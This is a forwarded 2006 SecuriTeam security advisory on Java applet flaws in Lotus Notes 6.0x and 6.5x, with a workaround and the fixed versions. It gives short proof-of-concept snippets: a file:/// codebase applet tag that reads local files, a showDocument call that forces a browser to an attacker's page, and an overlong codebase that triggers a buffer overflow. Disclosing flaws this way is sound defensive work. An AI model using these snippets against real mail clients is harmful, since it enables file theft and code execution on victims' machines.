> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, October 08, 2006 3:15 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Lotus Notes Multiple Java Applet Vulnerabilities
>
> The following security advisory is sent to the securiteam
> mailing list, and can be found at the SecuriTeam web site:
>
>
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate, Independent.
>
> Get your security news from a reliable source.
>
>
>
> - - - - - - - - -
>
>
>
> Lotus Notes Multiple Java Applet Vulnerabilities
>
>
>
> Lotus Notes is a groupware/e-mail system developed by Lotus
> Software. Due to its security and collaboration features it's
> used particularly by large organizations, government
> agencies, etc. IBM estimates it is used by 60 million people.
>
> The vulnerabilities involve Java applets embedded in HTML
> formatted e-mail messages. A contributing factor in all of
> the issues is that such Java applets are automatically
> displayed when the e-mail message is viewed (unlike with most
> e-mail clients).
>
>
> Vulnerable Systems:
> * Lotus Notes versions 6.0x.
> * Lotus Notes versions 6.5x.
>
> Global file read access:
> An e-mail message containing a Java Applet with the codebase
> "file:///" gains unlimited read access to local files when
> the e-mail is viewed. An example HTML snippet follows:
> <applet codebase="file:///"
> archive=";
> width="1" height="1"></applet>
>
>
> The applet's Java bytecode itself needn't be contained in the
> e-mail but it's only referenced by the archive URL. The
> applet gets automatically loaded when the e-mail is viewed.
> It has file read access on the local system (can read
> whatever files the currently logged in user can, and list
> hard drive contents). The applet can use e.g. JavaScript to
> relay the files to the attacker.
>
> Launching web browser:
> A Java applet embedded in the same way can forcibly launch a
> web browser with the desired URL when an e-mail message is viewed.
>
> An example piece of Java code to do this follows:
> public void init() {
>
> getAppletContext().showDocument("
> ploits.html");
> }
>
>
> Under default settings, Internet Explorer is launched and the
> attacker supplied URL is opened in it when the e-mail message
> is viewed. This exposes the system to Internet Explorer
> vulnerabilities, greatly widening the attack surface.
>
> Codebase buffer overflow:
> Opening an HTML e-mail message which contains an applet tag
> with a long codebase parameter (over 500 bytes) causes an
> apparently stack-based buffer overflow condition. It may be
> exploitable to run arbitrary code on the victim system when
> the e-mail message is viewed.
>
> This is an example piece of HTML to produce it:
> <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
> code="java.applet.Applet" width=100 height=100></applet>
>
> Exploitability of this scenario was NOT confirmed.
>
> Workaround:
> Disabling Java applets can be used to protect from these
> vulnerabilities.
> To disable Java applets, select File -> Preferences -> User
> Preferences from the Notes client menu and uncheck the option
> for "Enable Java applets."
>
> Fix:
> The issues have been addressed in Lotus Notes versions 6.5.4
> and 6.0.5.
> For detailed fix information, see:
> ;
> loc=en_US&cs=utf-8&cc=us?=en
>
>
> Additional Information:
> The information has been provided by Jouko Pynnonen
> <mailto:jouko@xxxxxx> .
> The original article can be found at:
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>
